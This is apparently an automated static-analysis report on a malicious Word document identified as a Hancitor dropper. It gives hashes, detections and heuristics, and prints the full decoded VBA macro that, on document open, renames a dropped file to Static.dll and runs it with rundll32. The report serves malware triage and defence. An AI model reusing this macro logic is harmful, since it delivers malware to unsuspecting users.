Hancitor — Office (OOXML) malware analysis

Static analysis result for SHA-256 7fec3b7708197761…

MALICIOUS

Office (OOXML)

880.4 KB Created: 2021-03-24 09:23:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2021-04-01
MD5: 27a24ecffb6986447e24f90a4cbdf55c SHA-1: e43ed590ada1e5b8983426086c0573479fa30491 SHA-256: 7fec3b77081977614f8603f5ef69272e6bab9b8c615580717e2ce6fe34615eb5
230 Risk Score

Malware Insights

Hancitor · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample is a Microsoft Office document containing VBA macros, specifically a Document_Open macro, which is a common technique for initial execution. The VBA code uses CreateObject to execute a second-stage payload, identified by ClamAV as Hancitor. The script constructs a command that appears to download and execute a file from a constructed path, likely involving a malicious executable.

Heuristics 7

  • ClamAV: Doc.Dropper.Hancitor-9845854-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Hancitor-9845854-0
  • VBA project inside OOXML medium 2 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set fso = CreateObject("Scripting.FileSystemObject")
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_Open()
  • Embedded OLE object medium OOXML_OLE_OBJECT
    Document contains an embedded OLE object
  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/10/21/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/9/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/10/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/11/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/12/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/13/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/14/chartexIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/inkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2017/model3dIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2016/wordml/cidIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 6

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 5124 bytes
SHA-256: 58be39504cbaedd7e605145e6970ef1e0a074ffc94f1ca5b7abc0bf535b199f3
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

  Private Declare PtrSafe Function Hogo Lib "shell32" _
        Alias "ShellExecuteA" (ByVal hwnd As Long, _
        ByVal lpOperation As String, ByVal lpFile As String, _
        ByVal lpParameters As String, ByVal lpDirectory As String, _
        ByVal nShowCmd As Long) As Long

Private Const SW_SHOWNORMAL = 1

Private Sub Document_Open()
Call stetptwwo
End Sub



Sub stetptwwo()
Dim nvbnf As String
 Dim yy As String

 Dim bcvxz As String
nvbnf = "\Sta" & "tic.d"
Dim vxcv As Integer
Dim hugs As Integer
hugs = chek

Dim ede As String
If hugs = 1 Then
Else
Dim edef As String

Call hhhhh
Dim pafh As String
pafh = iep
 bcvxz = pafh
Dim geto As String
Dim pus As String

geto = "nd"
Dim ter As String

Dim iof As String
iof = "3"
ter = "e"
iof = iof & "2"
Dim hgl As String
Dim jsd As String
jsd = geto
 Dim hh As String
 hh = iof & "." & ter & "xe"
 Dim fps As String
 fps = "r"
Dim laz As String
laz = "l"
 Dim fa As String
 fa = fps & "u" & jsd & "l" & laz & hh


hgl = ks
yy = bcvxz & nvbnf & hgl & hgl & ",JAAFKUFELAL"

  Hogo 0, vbNullString, _
    fa, yy, _
     vbNullString, SW_SHOWNORMAL
End If
End Sub



Attribute VB_Name = "Module1"
  


Function Getme(RootPath As String)
Dim hor As String

Dim fso As Object
Dim fld As Object
Dim vhhs As Object
Dim afs As String
Dim myArr
Dim pafh As String
pafh = iep
hor = pafh
Dim asdf
Dim cheza As String

asdf = RootPath
Dim fer As String

Set fso = CreateObject("Scripting.FileSystemObject")

Set fld = fso.GetFolder(asdf)
Dim uuj As String
uuj = "\msals.pumpl"
strFileExists = Dir(RootPath & uuj)
      If strFileExists = "" Then
    
For Each vhhs In fld.SUBFOLDERS


afs = vhhs
Dim kkl As String

kkl = Application.Run("Getme", vhhs.Path)


Next
    Set vhhs = Nothing
Getme = myArr
Set fld = Nothing
Set fso = Nothing



    Else
    Dim kurlbik As String
    kurlbik = hor
      If Dir(kurlbik & "\" & "Sta" & "tic.d" & "l" & "l") = "" Then
      
       kkl = Application.Run("hi", RootPath)

      Else
      Exit Function
  End If
    
        End If


End Function





Function chek()

Dim jos As String
Dim pafh As String
pafh = iep
jos = pafh

 
 If Dir(jos & "\" & "Sta" & "tic.d" & "l" & "l") = "" Then
 chek = 0
 Else

 chek = 1
 End If
End Function






Function ks()
Dim askl As String
askl = fuxk
ks = Left(askl, 1)
End Function




Sub nm(ololow As String)
Dim pafh As String
pafh = iep
  Name ololow & "\msals.pumpl" As pafh & "\" & "Sta" & "tic.d" & "l" & "l"
End Sub


Attribute VB_Name = "Module2"
Sub hi(myhome As String)
Dim plop As String
Dim pafh As String
pafh = iep
plop = pafh
Dim kkx As String
kkx = Application.Run("jop", myhome, plop & "\" & "Sta" & "tic.d" & "l" & "l")
End Sub


Sub hhhhh()
Dim posl As String
Dim pafh As String
pafh = iep
posl = pafh
Dim ntgs
Dim sda
Call cvbc
    ntgs = 50
sda = 49
Dim jos As String
Dim lsa As String
las = "\Te"
jos = posl
Dim yer As String
yer = "Loc" & "al" & las & "mp"
While sda < 50
      ntgs = ntgs - 1
      
      If Dir(Left(jos, ntgs) & yer, vbDirectory) = "" Then
        
    Else
  
   sda = 61
    End If

   Wend
   Dim klas As String
   klas = posl
Call Getme(Left(klas, ntgs) & yer)
  Selection.TypeBackspace
   

End Sub











Function lka(ff As String)
lka = ff
End Function






Attribute VB_Name = "Module3"



Function iep()
iep = Options.DefaultFilePath(wdStartupPath)
End Function





Attribute VB_Name = "Module4"


Sub checkthe(sf As String)

Dim pafh As String
pafh = iep

Dim ololow As String
ololow = sf
Dim nothings As String
nothings = 2

    If Dir(sf & "\msals.pumpl") = "" Then
    
    Else
         If Dir(nothings) = "" Then

        Call nm(ololow)
    Else
   Exit Sub
    End If
  
    End If
End Sub





Sub jop(uuu As String, aaaa As String)

Call rnee(uuu, aaaa)
End Sub



Sub bcvxzc()
    Selection.MoveRight Unit:=wdCharacter, Count:=5
    Selection.MoveDown Unit:=wdLine, Count:=23
    Selection.MoveRight Unit:=wdCharacter, Count:=51
       Selection.TypeBackspace
Call asfa
End Sub



Sub cvbc()
Selection.MoveDown Unit:=wdLine, Count:=1
    Selection.MoveRight Unit:=wdCharacter, Count:=5
    Selection.MoveDown Unit:=wdLine, Count:=23
    Selection.MoveRight Unit:=wdCharacter, Count:=51
 Selection.MoveDown Unit:=wdLine, Count:=23
Call bcvxzc
End Sub


Sub asfa()
   Selection.Copy
End Sub







Attribute VB_Name = "Module5"


Sub rnee(myhome As String, hsa As String)

Name myhome & "\msals.pu" & "mpl" As hsa
End Sub





Function fuxk()
fuxk = ThisDocument.Tables(1).Cell(1, 1).Range.Text
End Function
ooxml_oleobject_00.bin ooxml-ole-object OOXML embedded OLE part: word/embeddings/oleObject1.bin 551424 bytes
SHA-256: 713196928f6561476712c865bd3018812394b95b8e749bb2417e4a8752c8c558
Detection
ClamAV: Win.Trojan.Zusy-9861402-0
Obfuscation or payload: likely
Static shellcode analysis found candidate code region(s). Indicators: SC_STR_VIRTUALALLOC, SC_STR_LOADLIBRARY, SC_GETPC_CALL Static shellcode analysis recovered API/import strings: LoadLibraryExA, VirtualAlloc, GetProcAddress, ExitProcess
ooxml_oleobject_00_ole10native_00.bin ole-package OOXML word/embeddings/oleObject1.bin Ole10Native stream: Ole10Native 538957 bytes
SHA-256: cd80b2a74f74ba1c34fd11ddcead61d0cde39dcae991478b5c683daef15a8ce1
Detection
ClamAV: Win.Trojan.Zusy-9861402-0
Obfuscation or payload: likely
Static shellcode analysis found candidate code region(s). Indicators: SC_STR_VIRTUALALLOC, SC_STR_LOADLIBRARY, SC_GETPC_CALL Static shellcode analysis recovered API/import strings: LoadLibraryExA, VirtualAlloc, GetProcAddress, ExitProcess
ooxml_oleobject_00_ole10native_00_msals.pumpl ole-package-payload OOXML word/embeddings/oleObject1.bin Ole10Native payload: display_name=msals.pumpl; full_path=C:\Users\MyPc\AppData\Local\Temp\msals.pumpl; temp_path=; def_file= 538624 bytes
SHA-256: d99f202394df333f2626385c1af6a3d31926a1824206580d304de1f2facfcb07
Detection
ClamAV: Win.Trojan.Zusy-9861402-0
Obfuscation or payload: likely
Static shellcode analysis found candidate code region(s). Indicators: SC_STR_VIRTUALALLOC, SC_STR_LOADLIBRARY, SC_GETPC_CALL Static shellcode analysis recovered API/import strings: LoadLibraryExA, VirtualAlloc, GetProcAddress, ExitProcess
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 40960 bytes
SHA-256: 69ed4da399ea6459079d38bbb1d377f3c9bebe92867a46a00013c957e4619d31
Detection
ClamAV: Doc.Dropper.Hancitor-9845854-0
Obfuscation or payload: unlikely
emf_00.emf ooxml-emf OOXML EMF part: word/media/image2.emf 5000 bytes
SHA-256: 01840a548891d54182f3d161a568eee55966e2729c110ae9fff8f9d48b1688d5